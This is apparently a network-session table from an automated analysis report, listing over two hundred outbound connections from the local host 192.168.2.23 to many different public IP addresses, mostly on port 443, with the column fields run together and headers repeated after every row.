                                          21741192.168.2.235407237.131.124.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21742192.168.2.2340566115.229.71.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21743192.168.2.234862681.119.37.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21744192.168.2.2360972156.94.214.3443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21745192.168.2.235130234.224.153.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21746192.168.2.235507446.208.14.65443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21747192.168.2.2346586136.50.160.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21748192.168.2.2333620130.47.204.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21749192.168.2.235321843.21.159.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21750192.168.2.2338570126.173.46.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21751192.168.2.2335154176.146.220.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21752192.168.2.233622878.65.194.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21753192.168.2.2343948164.84.131.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21754192.168.2.233300265.248.191.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21755192.168.2.234451023.70.74.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21756192.168.2.2353136179.22.113.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21757192.168.2.233696095.86.237.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21758192.168.2.2354798187.111.182.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21759192.168.2.2343576120.92.21.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21760192.168.2.235728234.73.209.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21761192.168.2.234059620.148.167.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21762192.168.2.2348108114.211.27.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21763192.168.2.2341158129.176.30.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21764192.168.2.2355170112.16.205.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21765192.168.2.2339190132.156.59.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21766192.168.2.2352916155.207.191.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21767192.168.2.234269858.195.0.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21768192.168.2.235913025.191.36.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21769192.168.2.2348952154.86.207.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21770192.168.2.234145881.48.71.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21771192.168.2.2355656172.92.183.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21772192.168.2.234873093.134.137.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21773192.168.2.235853249.77.203.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21774192.168.2.23517349.114.74.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21775192.168.2.235895847.43.63.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21776192.168.2.2336136178.136.164.82443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21777192.168.2.234022680.158.101.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21778192.168.2.235777043.119.91.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21779192.168.2.235928671.64.222.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21780192.168.2.234853081.176.160.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21781192.168.2.234898639.205.113.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21782192.168.2.2350508162.169.161.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21783192.168.2.235274231.49.57.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21784192.168.2.2357018183.236.229.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21785192.168.2.23365208.158.20.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21786192.168.2.234394460.65.94.90443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21787192.168.2.234575632.100.25.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21788192.168.2.2343434169.105.63.8443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21789192.168.2.235182683.14.137.213443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21790192.168.2.234317493.243.20.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21791192.168.2.2339124154.20.17.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21792192.168.2.2358936141.96.99.101443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21793192.168.2.2352570155.129.34.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21794192.168.2.2338168188.29.22.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21795192.168.2.235717687.63.162.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21796192.168.2.233546648.83.59.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21797192.168.2.236029477.120.244.27443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21798192.168.2.2347720216.113.249.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21799192.168.2.2351956173.143.6.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21800192.168.2.2347694153.85.177.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21801192.168.2.2341288107.132.37.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21802192.168.2.2338112123.215.247.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21803192.168.2.2346742199.69.140.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21804192.168.2.2352180193.232.29.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21805192.168.2.235401023.160.178.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21806192.168.2.2357622136.183.44.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21807192.168.2.234186669.78.38.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21808192.168.2.2353982125.81.46.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21809192.168.2.235291240.164.130.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21810192.168.2.234710274.16.145.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21811192.168.2.235229042.190.208.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21812192.168.2.235154219.171.209.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21813192.168.2.2350032162.8.232.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21814192.168.2.234820634.124.144.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21815192.168.2.234406232.43.221.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21816192.168.2.2338026136.86.221.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21817192.168.2.235887823.207.69.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21818192.168.2.2338866206.108.136.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21819192.168.2.2333788117.127.251.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21820192.168.2.2350218185.56.181.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21821192.168.2.235335075.30.62.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21822192.168.2.235840853.227.168.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21823192.168.2.23481044.103.11.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21824192.168.2.234665091.20.219.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21825192.168.2.2355548145.82.21.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21826192.168.2.2351260197.112.43.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21827192.168.2.235288436.149.115.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21828192.168.2.2337016181.158.32.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21829192.168.2.2353712208.211.25.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21830192.168.2.2356286182.18.39.144443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21831192.168.2.2354932199.120.23.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21832192.168.2.235470867.216.220.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21833192.168.2.233436088.174.204.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21834192.168.2.2337042154.58.35.239443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21835192.168.2.2341056102.181.221.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21836192.168.2.234259899.71.20.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21837192.168.2.2338094108.22.184.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21838192.168.2.2335712223.81.164.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21839192.168.2.2354362158.118.204.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21840192.168.2.235875690.63.250.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21841192.168.2.234839874.68.145.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21842192.168.2.2353540145.34.164.75443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21843192.168.2.2349768166.54.46.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21844192.168.2.233780691.125.51.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21845192.168.2.2352360180.127.173.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21846192.168.2.234307439.213.113.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21847192.168.2.2360542187.246.87.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21848192.168.2.234583481.165.27.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21849192.168.2.23411462.25.126.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21850192.168.2.2346016182.33.64.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21851192.168.2.234324092.43.147.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21852192.168.2.2359128188.119.226.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21853192.168.2.234190865.233.137.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21854192.168.2.233823454.145.28.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21855192.168.2.235726017.89.140.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21856192.168.2.2357530151.226.71.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21857192.168.2.2351746156.137.26.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21858192.168.2.2351806158.168.23.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21859192.168.2.2343520142.234.235.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21860192.168.2.2346694124.247.5.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21861192.168.2.234678847.48.170.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21862192.168.2.234064480.127.36.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21863192.168.2.2341652210.142.230.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21864192.168.2.2336298115.138.50.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21865192.168.2.2357882103.113.161.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21866192.168.2.2334932171.23.190.28443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21867192.168.2.2339762132.225.246.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21868192.168.2.2338704104.211.102.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21869192.168.2.236023875.104.216.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21870192.168.2.233924078.136.133.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21871192.168.2.2334904123.60.151.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21872192.168.2.23469068.206.48.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21873192.168.2.2354710136.163.152.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21874192.168.2.2350924195.98.181.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21875192.168.2.2341052187.128.167.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21876192.168.2.2358378157.142.100.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21877192.168.2.233544076.242.244.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21878192.168.2.233316070.155.82.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21879192.168.2.2335372152.23.64.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21880192.168.2.2352722130.168.205.60443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21881192.168.2.2334862158.135.24.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21882192.168.2.2342476133.151.16.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21883192.168.2.2344112160.115.104.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21884192.168.2.234159652.20.249.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21885192.168.2.2349002100.38.223.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21886192.168.2.2350642106.138.82.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21887192.168.2.2357824223.115.249.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21888192.168.2.234518670.183.226.203443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21889192.168.2.235117832.179.137.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21890192.168.2.2348044186.243.17.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21891192.168.2.2352072151.211.110.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21892192.168.2.235918441.161.217.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21893192.168.2.23607308.98.186.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21894192.168.2.233646093.57.126.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21895192.168.2.2357734185.123.11.48443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21896192.168.2.235003693.253.44.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21897192.168.2.235428658.191.138.211443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21898192.168.2.235662031.215.118.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21899192.168.2.2346698167.67.60.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21900192.168.2.2341188178.229.89.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21901192.168.2.2336582112.61.251.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21902192.168.2.234079287.4.117.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21903192.168.2.234681290.243.183.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21904192.168.2.233686242.219.145.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21905192.168.2.2348148138.121.159.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21906192.168.2.2344468160.181.19.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21907192.168.2.2334354193.95.167.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21908192.168.2.2355198185.217.58.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21909192.168.2.2333560211.233.62.154443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21910192.168.2.233596261.184.64.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21911192.168.2.23396529.26.178.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21912192.168.2.235844031.7.22.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21913192.168.2.234088063.229.48.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21914192.168.2.235005478.23.143.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21915192.168.2.235774662.27.117.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21916192.168.2.2345556144.36.217.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21917192.168.2.2335486203.125.202.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21918192.168.2.2356622102.200.166.133443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21919192.168.2.2344818133.220.124.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21920192.168.2.2356572134.70.105.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21921192.168.2.2333242147.163.146.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21922192.168.2.2355474160.230.42.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21923192.168.2.2342188102.130.57.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21924192.168.2.2334134133.221.211.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21925192.168.2.2338342125.211.43.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21926192.168.2.2359600158.201.153.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21927192.168.2.2351878199.223.169.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21928192.168.2.2338204217.252.216.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21929192.168.2.2348548165.225.235.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21930192.168.2.234616482.157.46.2178080
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21931192.168.2.2340174219.173.71.222443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21932192.168.2.235124495.226.9.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21933192.168.2.2339138152.142.164.49443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21934192.168.2.2356130213.172.5.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21935192.168.2.2342482124.46.111.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21936192.168.2.234827066.32.137.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21937192.168.2.235149073.138.1.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21938192.168.2.2352962208.98.19.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21939192.168.2.2355956112.165.38.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21940192.168.2.2354640190.34.148.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21941192.168.2.234763841.21.114.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21942192.168.2.236052467.8.127.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21943192.168.2.2339242135.166.69.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21944192.168.2.2360538177.89.165.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21945192.168.2.2346224108.192.97.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21946192.168.2.2334964108.208.207.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21947192.168.2.234409471.193.74.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21948192.168.2.233968296.8.22.104443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21949192.168.2.233794449.8.144.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21950192.168.2.235895296.245.163.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21951192.168.2.2336640147.108.18.25443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21952192.168.2.2339982171.191.249.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21953192.168.2.2349316120.31.10.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21954192.168.2.2340414118.238.211.102443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21955192.168.2.2345666187.161.189.59443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21956192.168.2.236041071.78.56.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21957192.168.2.2359308167.177.43.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21958192.168.2.2346642171.238.202.71443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21959192.168.2.233799814.57.69.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21960192.168.2.235950824.250.205.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21961192.168.2.2350878122.83.254.47443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          21962192.168.2.235691486.97.111.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
